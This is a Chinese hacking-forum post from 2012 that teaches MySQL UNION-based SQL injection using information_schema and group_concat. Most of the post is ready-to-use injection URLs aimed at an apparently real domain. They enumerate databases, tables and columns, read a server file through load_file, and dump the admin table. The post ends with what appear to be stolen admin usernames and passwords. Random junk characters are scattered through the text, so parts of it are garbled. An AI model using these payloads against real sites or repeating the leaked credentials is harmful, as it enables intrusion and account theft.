中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]
作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
) R" p# l/ D! r, U1 f但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
( l) o; k& e6 B5 U( @: n0 }: Y7 T8 L
* z4 [4 c7 C/ @# C* S/ ?
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入2 E& j; ?9 h8 a- ]: w7 K  _

3 V+ o- O* W; R$ x) p2 t2 j( |缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...9 w1 l/ y  F1 C  l/ a$ I: g/ p+ f# m
; j0 D, U3 P4 I3 A
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示0 s3 k* X: Z, T  t
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等! n3 ]2 H9 Q& p3 ^2 A# [

7 I" N$ |1 n. d- E3 v1 X" Ohttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
# N, w+ Y3 N6 Z2 M
5 n3 o( f9 D% W( L4 m* m+ w读出所有库:2 V$ ]& _1 f6 N* {8 a
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA5 G, a8 ~% u2 E, k* P, v
) [( t- J% ]& s& p

2 h5 Y3 @( w  u3 H  x  b3 U! S/ K7 k2 C
! {& S) n1 K& Z1 ?/ @读出所有表:
) D6 N9 K( Z8 |! G$ Q! Lhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
! O( N7 I& X/ b) Z6 s) R& N8 g3 z
/ e) d' H0 n! F0 i1 ]+ n: p, I读出所有表字段:5 W* b- r, C/ W; I5 a, p3 f
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
1 h4 o" l8 }" z6 Z/ e*/ (97,100,109,105,110)为admin的ascii码 依次类推
- \/ j5 p* }9 T! E) a% g+ C5 b  G- l9 N3 W4 x% y; @& [
读出所有表字段里的内容:
5 P' T3 T! `8 u3 O/ F3 |  rhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin. X. {* D# S- ~  C0 ]% X2 g  ^
) A: ]4 `+ O, i8 \) a
# b5 z9 I& x7 H& a; n1 \
) u* @& Q' n7 S+ A! l

: R( I4 j! O) q: e& ?. H  M! W. r8 w& j0 q5 R- ~

4 q% p4 \+ g7 Ehttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
* W6 g/ T/ g$ e) I
) n" M  X0 L1 r" c0 |) t7 [$ l) {8 q+ J' u# W
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
) B) H% M2 W( P7 V3 }8 T
0 ~" D) P) _' Z; o/ V* T9 uhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
; P; g$ b8 Y# l. m! b3 [, B7 h$ G# y# U& l  ~

6 ]% V0 R% n' g* Xhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
- K/ Y1 }8 s# H8 [
7 Z) o. L8 i3 a0 _2 s$ d) B3 x% a# Z
        webmaster:dzb521123,simlab:simadmin20043233, U4 H8 ^; Q4 b& \5 C% v7 ~6 L' z0 `




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2